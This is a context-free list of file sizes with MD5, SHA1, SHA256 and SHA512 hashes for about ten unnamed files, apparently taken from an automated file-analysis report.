SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD5a9d5a55646a268805a98533fe53dd0c0
SHA18e870960de2f16d5688b6d7d8d9f88507220bd8f
SHA25604f95e259d0a862c42bbf0b81e79cf760a8e223781cb4259f8ca8127d41fe488
SHA51294a9ac797018a1ca784edffa7452a66b48d46f853904e3789ac0693b6d350a0ab64c3b72e7aa0e33ab884b54c0c87ad3444b41e6fa484eb3159b97fb4424a5e8
-
Filesize
1KB
MD5632d7e5a3dbfb6bd0bd8091157840301
SHA1cfcae76b0425383ba41acb14ad8751c583b629e0
SHA2566a0933cbfe8e4dacfc49593d6863b9d9182277d81eb5ae65cf7ec5730f9fed5e
SHA51275ba2c073d716d3ac6d05ef62e16b7b67a3f07dcb7c9f932fd4ac5c19a382de19fcda3aebb00ec4c9f48614c9314f79036229193dd650e3cd2e1ba49d229f982
-
Filesize
149B
MD588dcd5617dd260ed6e8ac935c6a9d319
SHA114f90d4f10f4fe776d36198d3e89708b3f521b52
SHA2568c0f664553ee0f5606b4a301d976f4d463fa8d2b46f81028c51b408a96935b09
SHA512c87032629d35334ed0230a6ed3762152b27d9b028825a151af624d41393044475a1e959cbb09531988f7d3c55cf1ba4e32919fa1c746820abf08576e7cac7ed8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
110KB
MD50a6a8e886c60cb2383fc81845f882d89
SHA104f7ccd541b649300d312feaf7320db31d246baf
SHA25650582f0d3bafcb7271fa8e82e7a3ec79c839f92d06168f51ee8a11ab3799e718
SHA5125d35d245d5e14e2144774a8ac98b8f922b86a716cc9d448be83365dc377c5d74b630e0b773d05cbea13e95d680e4fef9fb73d63cd9c90b750c69723931dad54b
-
Filesize
2KB
MD589b53a0f8b97d0ffa14f72ec4dfa6cc0
SHA1ee1c97c397d1aaec43dcbdae638b4f0441f8ef5e
SHA256cea6625f474937dd1c7bc4f37e96718020e7a39acaf93d4f38e330e63e2f0e38
SHA512c4a5975158d42c710815df963288baf6ff02e0d990655ac676c4fd1e1f20388596b4b54838ffeeac7f034cf98532b30911022d04c70e3f6853b627e84fb0c7cb
-
Filesize
13KB
MD59b600733923fe66877356b4a5b3f86ba
SHA16765a9937938ef2e1094eed46a80a93ea11cb0b3
SHA256be59442f642eacf45f3bd4ae6e440edfcf9a25d735e2aec603091e2a9648d58b
SHA512e3263eb5caabd64e369dd9163c7d84a0097a5d70940cc5b8753a506c2d7ca036b5362b42aad7ded023edbcb55fd6d005eef28f3fd8de8adfb8fbcb84fa017d43
-
Filesize
14KB
MD507a977d03775ee2920b9ae12dfb702f7
SHA169f732ef9d6c8f1dda5cfe6d65523c3844cfce0b
SHA256a9158f006fd905583b5eab76007d4f82734d4b9c4f872e9b3c46eb9221803a28
SHA512b54d068dae10691b57587652ad436cde6daab9aa4978921ea82b594d2f42df54ce632fa4ffb10e9a30452d1afe3a75dfae700e61e927a4f7b3d9434b063e0318
-
Filesize
1KB
MD544b2da39ceb2c183d5dcd43aa128c2dd
SHA1502723d48caf7bb6e50867685378b28e84999d8a
SHA256894ee2b19608d10df4bf8b8f5bbcf40ce38c09c1f4c5543b6164f40c04bb270d
SHA51217744dcaddb49f17fe67dc3a579f4df2b6c2b196776330b71edfc58b37d1f8ae477bfb718d2f23401b78b789b7f984b19341f50fbecfba1bc101f596dee40604